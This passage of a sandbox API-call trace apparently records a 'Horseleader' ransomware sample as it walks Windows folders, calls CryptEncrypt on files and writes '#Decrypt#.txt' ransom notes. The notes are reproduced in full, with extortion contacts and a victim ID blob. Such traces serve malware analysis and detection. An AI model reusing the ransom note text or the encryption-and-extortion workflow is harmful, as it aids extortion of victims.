pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*") returned 62 [0229.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.426] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\.") returned 62 [0229.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.426] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.426] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.426] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\..") returned 63 [0229.426] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.426] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.426] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.426] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.426] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 76 [0229.426] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.427] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.427] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.427] lstrlenW (lpString=".testttjffg") returned 11 [0229.427] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.427] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.427] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.952] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.953] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.953] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\#Decrypt#.txt") returned 74 [0229.953] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.956] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0229.957] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.958] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0229.958] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.959] CloseHandle (hObject=0x158) returned 1 [0229.959] GetProcessHeap () returned 0x780000 [0229.959] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.960] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="el-GR", cAlternateFileName="")) returned 1 [0229.960] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0229.960] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned 60 [0229.960] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0229.960] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0229.960] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.960] GetProcessHeap () returned 0x780000 [0229.960] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.960] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*") returned 62 [0229.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.961] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.961] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\.") returned 62 [0229.961] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.961] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.961] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.961] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\..") returned 63 [0229.961] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.961] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.961] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.961] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.961] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 76 [0229.961] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.961] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.961] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.961] lstrlenW (lpString=".testttjffg") returned 11 [0229.961] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.961] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.962] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.962] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.962] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.962] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\#Decrypt#.txt") returned 74 [0229.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.963] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0229.963] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.965] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0229.965] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.965] CloseHandle (hObject=0x158) returned 1 [0229.965] GetProcessHeap () returned 0x780000 [0229.965] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.965] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0229.965] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0229.965] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 60 [0229.965] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0229.965] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0229.965] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.966] GetProcessHeap () returned 0x780000 [0229.966] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.966] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*") returned 62 [0229.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.984] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.984] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\.") returned 62 [0229.984] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.984] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.985] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.985] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\..") returned 63 [0229.985] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.985] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.985] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0229.985] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="Windows") returned -1 [0229.985] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 78 [0229.985] StrStrIW (lpFirst="boxed-correct.avi", lpSrch=".horseleader") returned 0x0 [0229.985] lstrcmpW (lpString1="boxed-correct.avi", lpString2="#Decrypt#.txt") returned 1 [0229.985] lstrcmpW (lpString1="boxed-correct.avi", lpString2="_uninstalling_.png") returned 1 [0229.985] lstrlenW (lpString=".testttjffg") returned 11 [0229.985] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpSrch=".testttjffg") returned 0x0 [0229.985] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.985] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.996] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b3de0, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23b3de0, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a49fdc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="boxed-delete.avi", cAlternateFileName="")) returned 1 [0229.996] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="Windows") returned -1 [0229.996] wnsprintfW (in: 